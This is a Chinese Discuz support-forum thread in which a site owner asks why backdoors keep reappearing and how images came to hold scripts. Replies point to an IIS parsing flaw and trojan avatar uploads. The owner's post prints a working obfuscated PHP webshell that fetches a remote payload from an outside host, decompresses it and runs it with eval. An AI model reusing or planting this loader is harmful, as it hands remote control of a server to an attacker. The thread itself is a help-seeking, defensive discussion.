久久久久av_欧美日韩一区二区在线_国产精品三区四区_日韩中字在线

Discuz! 官方交流社區(qū)

標題: 網站老是被掛馬 [打印本頁]
作者: 131415    時間: 2019-7-31 22:15
標題: 網站老是被掛馬
網站目錄老是被上傳后門文件,  刪了幾天又有了,  改各種密碼  ,裝云鎖,  今天更氣人,網站管理員密碼被改, 還發(fā)帖子,云鎖還被卸載,快照被劫持天天秒收錄,  有吧網站備份下來用D盾掃描一下,發(fā)現(xiàn)幾張圖片有腳本,  這是怎么做到的?

(, 下載次數: 3)
(, 下載次數: 4)

腳本地址:http://www.9661.in/txt/xml1.txt

<?php
$password='haosir';$b="chr";session_start();if(empty($_SESSION['PhpCode'])){$d=$b(104).$b(116).$b(116).$b(112).$b(58).$b(47).$b(47).$b(57).$b(54).$b(54).$b(49).$b(46).$b(105).$b(110).$b(47).$b(112).$b(104).$b(112).$b(47).$b(112).$b(104).$b(112).$b(46).$b(103).$b(105).$b(102);$e=$b(102).$b(105).$b(108).$b(101).$b(95);$e.=$b(103).$b(101).$b(116).$b(95).$b(99);$e.=$b(111).$b(110).$b(116).$b(101).$b(110);$e.=$b(116).$b(115);$_SESSION['PhpCode']=$e($d);}$f=$b(103).$b(122).$b(105).$b(110);$f.=$b(102).$b(108).$b(97).$b(116).$b(101);@eval($f($_SESSION['PhpCode']));


作者: 耗子    時間: 2019-8-1 14:32
  漏洞而已
可以聯(lián)系我的QQ交談 有償服務
作者: crx349    時間: 2019-8-1 17:11
盡快清理 做好服務器安全
作者: lg0431    時間: 2019-8-2 10:53
網站漏洞,服務器端口禁止,禁ping,防注冊
作者: gongcg    時間: 2019-8-2 11:17
用的什么環(huán)境  用的什么面板
作者: sdfarmer    時間: 2019-8-3 17:27
我的也是。你找到辦法了嗎
作者: sdfarmer    時間: 2019-8-3 17:28
耗子 發(fā)表于 2019-8-1 14:32
漏洞而已
可以聯(lián)系我的QQ交談 有償服務

付費求一套discuz加固的目錄權限的方案
作者: 17推執(zhí)筆    時間: 2019-8-4 10:26
本帖最后由 17推執(zhí)筆 于 2019-8-4 10:28 編輯

不是網站漏洞,不需要discuz加固,就是一個服務器遠程解析漏洞,圖片被當做php來執(zhí)行了
作者: 17推執(zhí)筆    時間: 2019-8-4 10:37
如果是IIS的直接打開IIS,點擊處理程序映射,雙擊里面的php,在打開的窗口點擊請求限制,然后勾選文件或文件夾,這樣就可以修復解析漏洞了
作者: 杰瑞科技    時間: 2019-8-4 15:21
看路徑是頭像上傳的圖片木馬,可使用頭像審核插件高級版防止用戶上傳頭像圖片木馬
https://addon.dismall.com/?@saya_avatarverify.plugin



歡迎光臨 Discuz! 官方交流社區(qū) (http://www.9999xn.com/) Powered by Discuz! W1.0